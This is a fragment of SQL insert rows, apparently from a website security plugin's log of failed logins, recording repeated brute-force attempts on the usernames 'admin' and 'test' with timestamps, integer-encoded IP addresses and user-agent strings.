(98634, 1491943772.308494, 1, 'loginFailInvalidUsername', 'test', 0, 2919470527, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98633, 1491943770.916576, 1, 'loginFailInvalidUsername', 'test', 0, 2919470527, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98632, 1491943532.537123, 1, 'loginFailInvalidUsername', 'test', 0, 787923107, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98631, 1491943531.444666, 1, 'loginFailInvalidUsername', 'test', 0, 787923107, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98629, 1491943520.412182, 1, 'loginFailInvalidUsername', 'test', 0, 623054046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98630, 1491943521.573624, 1, 'loginFailInvalidUsername', 'test', 0, 623054046, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98628, 1491941187.000758, 1, 'loginFailValidUsername', 'admin', 1, 3103997920, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2700.13 Safari/537.36'),
(98627, 1491940245.890727, 1, 'loginFailInvalidUsername', 'test', 0, 1744310190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98626, 1491940244.359866, 1, 'loginFailInvalidUsername', 'test', 0, 1744310190, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98625, 1491935370.287061, 1, 'loginFailInvalidUsername', 'test', 0, 3206613747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98624, 1491935368.831126, 1, 'loginFailInvalidUsername', 'test', 0, 3206613747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98623, 1491930032.459466, 1, 'loginFailInvalidUsername', 'test', 0, 2380442744, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98622, 1491930030.359086, 1, 'loginFailInvalidUsername', 'test', 0, 2380442744, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98621, 1491926731.674601, 1, 'loginFailInvalidUsername', 'test', 0, 1600049530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98620, 1491926730.634788, 1, 'loginFailInvalidUsername', 'test', 0, 1600049530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98619, 1491920986.902940, 1, 'loginFailInvalidUsername', 'test', 0, 1834783836, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98618, 1491920985.812002, 1, 'loginFailInvalidUsername', 'test', 0, 1834783836, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98617, 1491919740.455144, 1, 'loginFailInvalidUsername', 'test', 0, 2567295251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98616, 1491918134.894169, 1, 'loginFailInvalidUsername', 'test', 0, 1892844615, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98615, 1491918133.400172, 1, 'loginFailInvalidUsername', 'test', 0, 1892844615, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98614, 1491913627.463823, 1, 'loginFailInvalidUsername', 'test', 0, 2332058817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98613, 1491913625.912601, 1, 'loginFailInvalidUsername', 'test', 0, 2332058817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98612, 1491912750.638194, 1, 'loginFailInvalidUsername', 'test', 0, 1203878394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98611, 1491912749.394249, 1, 'loginFailInvalidUsername', 'test', 0, 1203878394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98610, 1491908442.624647, 1, 'loginFailInvalidUsername', 'test', 0, 84802271, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98609, 1491908441.350519, 1, 'loginFailInvalidUsername', 'test', 0, 84802271, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98608, 1491907108.504516, 1, 'loginFailInvalidUsername', 'test', 0, 737870170, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98607, 1491907106.464629, 1, 'loginFailInvalidUsername', 'test', 0, 737870170, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98606, 1491903501.738590, 1, 'loginFailInvalidUsername', 'test', 0, 3564504202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98605, 1491903500.082931, 1, 'loginFailInvalidUsername', 'test', 0, 3564504202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98604, 1491902126.755742, 1, 'loginFailInvalidUsername', 'test', 0, 1335820244, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98603, 1491901577.113485, 1, 'loginFailInvalidUsername', 'test', 0, 3173392906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98602, 1491901575.748328, 1, 'loginFailInvalidUsername', 'test', 0, 3173392906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98601, 1491899994.310835, 1, 'loginFailInvalidUsername', 'test', 0, 3022935071, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98600, 1491899992.745681, 1, 'loginFailInvalidUsername', 'test', 0, 3022935071, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98599, 1491895281.193766, 1, 'loginFailInvalidUsername', 'test', 0, 3159219059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98598, 1491889511.552269, 1, 'loginFailInvalidUsername', 'test', 0, 3058308618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98597, 1491889510.325900, 1, 'loginFailInvalidUsername', 'test', 0, 3058308618, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98596, 1491888020.068052, 1, 'loginFailValidUsername', 'admin', 1, 1579183514, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98595, 1491888019.325560, 1, 'loginFailValidUsername', 'pablo', 3, 1579183514, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(98594, 1491887620.871373, 1, 'loginFailInvalidUsername', 'test', 0, 3373708590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98593, 1491887619.382798, 1, 'loginFailInvalidUsername', 'test', 0, 3373708590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98592, 1491881903.723314, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98591, 1491881903.403924, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98590, 1491881903.085397, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98589, 1491881902.765406, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98588, 1491881902.446422, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98587, 1491881902.126416, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98586, 1491881901.795057, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98585, 1491881901.477096, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98584, 1491881901.088559, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98583, 1491881900.769422, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98582, 1491881900.449249, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98581, 1491881900.124944, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98580, 1491881899.793917, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98579, 1491881899.475555, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98578, 1491881899.157133, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98576, 1491881898.508018, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98577, 1491881898.838333, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98575, 1491881898.177672, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98574, 1491881897.850866, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98573, 1491879539.064309, 1, 'loginFailInvalidUsername', 'test', 0, 3190692170, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98572, 1491876506.449498, 1, 'loginFailInvalidUsername', 'test', 0, 1484644302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98571, 1491876505.411407, 1, 'loginFailInvalidUsername', 'test', 0, 1484644302, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98570, 1491873807.169569, 1, 'loginFailInvalidUsername', 'test', 0, 645225201, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98569, 1491868562.487114, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98568, 1491868562.168310, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98567, 1491868561.846233, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98566, 1491868561.528604, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98565, 1491868561.198366, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98564, 1491868560.879565, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98563, 1491868560.561873, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98562, 1491868560.241661, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98561, 1491868559.917637, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98560, 1491868559.587929, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98559, 1491868559.269070, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98558, 1491868558.938420, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98557, 1491868558.619615, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98556, 1491868558.302370, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98555, 1491868557.972340, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98554, 1491868557.639523, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98553, 1491868557.321674, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98552, 1491868557.004018, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98551, 1491868556.667028, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98550, 1491863819.935224, 1, 'loginFailInvalidUsername', 'test', 0, 2536603054, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98549, 1491862551.355344, 1, 'loginFailInvalidUsername', 'test', 0, 1833107563, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98548, 1491862550.200512, 1, 'loginFailInvalidUsername', 'test', 0, 1833107563, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98547, 1491862408.353808, 1, 'loginFailInvalidUsername', 'test', 0, 2970192100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98546, 1491862406.942287, 1, 'loginFailInvalidUsername', 'test', 0, 2970192100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98545, 1491859445.706773, 1, 'loginFailInvalidUsername', 'test', 0, 1555628893, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98544, 1491859444.650695, 1, 'loginFailInvalidUsername', 'test', 0, 1555628893, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98543, 1491859400.356240, 1, 'loginFailInvalidUsername', 'test', 0, 3001018728, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98542, 1491856736.813261, 1, 'loginFailInvalidUsername', 'test', 0, 1307202658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98541, 1491856735.692087, 1, 'loginFailInvalidUsername', 'test', 0, 1307202658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98540, 1491855360.425418, 1, 'loginFailInvalidUsername', 'test', 0, 657681325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98539, 1491855359.125618, 1, 'loginFailInvalidUsername', 'test', 0, 657681325, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98538, 1491853762.933528, 1, 'loginFailInvalidUsername', 'test', 0, 1498370536, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98537, 1491853761.882152, 1, 'loginFailInvalidUsername', 'test', 0, 1498370536, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98536, 1491853248.968336, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98535, 1491853248.650358, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98534, 1491853248.331506, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98533, 1491853248.001867, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98532, 1491853247.683578, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98531, 1491853247.364324, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98530, 1491853247.045679, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98529, 1491853246.715365, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98528, 1491853246.395794, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98527, 1491853246.073287, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98526, 1491853245.750287, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98525, 1491853245.431541, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98524, 1491853245.113267, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98523, 1491853244.794738, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98522, 1491853244.475267, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98521, 1491853244.155490, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98520, 1491853243.837482, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98519, 1491853243.519404, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98518, 1491853243.198624, 1, 'loginFailValidUsername', 'admin', 1, 3056763507, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98517, 1491853103.909389, 1, 'loginFailInvalidUsername', 'test', 0, 628649007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98516, 1491853102.926408, 1, 'loginFailInvalidUsername', 'test', 0, 628649007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98515, 1491849038.118788, 1, 'loginFailInvalidUsername', 'test', 0, 1535115201, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98514, 1491849037.140285, 1, 'loginFailInvalidUsername', 'test', 0, 1535115201, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98513, 1491844071.319176, 1, 'loginFailInvalidUsername', 'test', 0, 1768578009, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98512, 1491844070.044106, 1, 'loginFailInvalidUsername', 'test', 0, 1768578009, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98412, 1491810469.518834, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98413, 1491810469.836538, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98414, 1491810470.166073, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98415, 1491810470.496061, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98416, 1491810470.825631, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98417, 1491810471.144801, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98418, 1491810471.462416, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98419, 1491810471.781209, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98420, 1491810472.099890, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98421, 1491810472.601690, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98422, 1491810472.919266, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98423, 1491810473.238749, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98424, 1491810473.568894, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98425, 1491810473.887723, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98426, 1491810474.207541, 1, 'loginFailValidUsername', 'admin', 1, 1049988937, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98427, 1491816332.773399, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98428, 1491816333.177678, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98429, 1491816333.498136, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98430, 1491816333.820847, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98431, 1491816334.145105, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98432, 1491816334.478153, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98433, 1491816334.811772, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98434, 1491816335.143553, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98435, 1491816335.464270, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98436, 1491816335.815039, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98437, 1491816336.136822, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98438, 1491816336.472509, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
